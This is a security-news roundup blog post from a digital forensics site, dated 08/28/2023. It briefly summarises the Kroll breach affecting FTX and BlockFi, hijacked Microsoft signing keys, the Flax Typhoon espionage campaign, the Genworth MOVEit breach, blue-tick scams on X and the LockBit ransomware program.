AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 08/28/2023

FTX, BlockFi’s Customer Data Compromised in Kroll Hack

Customer data of bankrupt crypto exchange FTX and lender BlockFi have been compromised due to a hack of Kroll, a third party agent that manages creditor claims on behalf of bankrupt companies. Crypto account passwords and other sensitive data weren’t affected, but customers were warned to be on the lookout for scammers impersonating parties in the bankruptcy. An “unauthorized third party gained access to certain BlockFi client data housed on Kroll’s platform,” BlockFi said in a tweeted statement, and FTX said it was “closely monitoring the situation.”


Microsoft signing keys keep getting hijacked, to the delight of Chinese threat actors

In July, security researchers revealed a sobering discovery: hundreds of pieces of malware used by multiple hacker groups to infect Windows devices had been digitally signed and validated as safe by Microsoft itself. On Tuesday, a different set of researchers made a similarly solemn announcement: Microsoft’s digital keys had been hijacked to sign yet more malware for use by a previously unknown threat actor in a supply-chain attack that infected roughly 100 carefully selected victims.


Privacy regulators tell social media companies to fear the scrapers

Social media companies and other businesses have an obligation to protect users’ publicly available information from data scrapers that gather it for unintended purposes, an international group of privacy regulators said Thursday. “Personal information that is publicly accessible is still subject to data protection and privacy laws in most jurisdictions,” 12 agencies said in a joint statement. Stopping unlawful data scraping requires “multi-layered technical and procedural controls,” the agencies said, and “vigilance is paramount.”


China Unleashes Flax Typhoon APT to Live Off the Land, Microsoft Warns

A China-backed advanced persistent threat (APT) group dubbed Flax Typhoon has installed a web of persistent, long-term infections inside dozens of Taiwanese organizations, likely to carry out an extensive cyber espionage campaign — and it did it using only minimal amounts of malware. According to Microsoft, the state-sponsored cyberattack group is living off the land for the most part, using legitimate tools and utilities built into the Windows operating system to carry out an extremely stealthy and persistent operation.


Genworth Financial Under Investigation for Data Breach

Schubert Jonckheer & Kolbe LLP is investigating a data breach impacting the personal information of over 2.5 million customers, policy holders, and agents of Genworth Financial, Inc. and its affiliated life insurance companies. The data breach, first disclosed on May 31, 2023, stemmed from a third-party vendor’s use of the popular MOVEit file transfer program, which attackers exploited using a security vulnerability reportedly present in software versions dating back to 2021. Genworth contracts with the vendor, PBI Research Services, to identify member deaths. PBI used the exploited software program to transfer files containing the sensitive personal information of certain Genworth customers and insurance agents.


Blue-tick scammers target consumers who complain on X

Consumers who complain of poor customer service on X are being targeted by scammers after the social media platform formerly known as Twitter changed its account verification process. Bank customers and airline passengers are among those at risk of phishing scams when they complain to companies via X. Fraudsters, masquerading as customer service agents, respond under fake X handles and trick victims into disclosing their bank details to get a promised refund. They typically win the trust of victims by displaying the blue checkmark icon, which until this year denoted accounts that had been officially verified by X.


Lockbit leak, research opportunities on tools leaked from TAs

Lockbit is one of the most prevalent ransomware strains. It comes with an affiliate ransomware-as-a-service (RaaS) program offering up to 80% of the ransom demand to participants, and includes a bug bounty program for those who detect and report vulnerabilities that allow files to be decrypted without paying the ransom. According to the Lockbit owners, the namesake cybercriminal group, there have been bounty payments of up to 50 thousand dollars. In addition to these features, Lockbit has offered a searchable portal to query leaked information from companies targeted by this ransomware family, and even offered payment to those who get tattooed with a Lockbit logo on their body.

Related Posts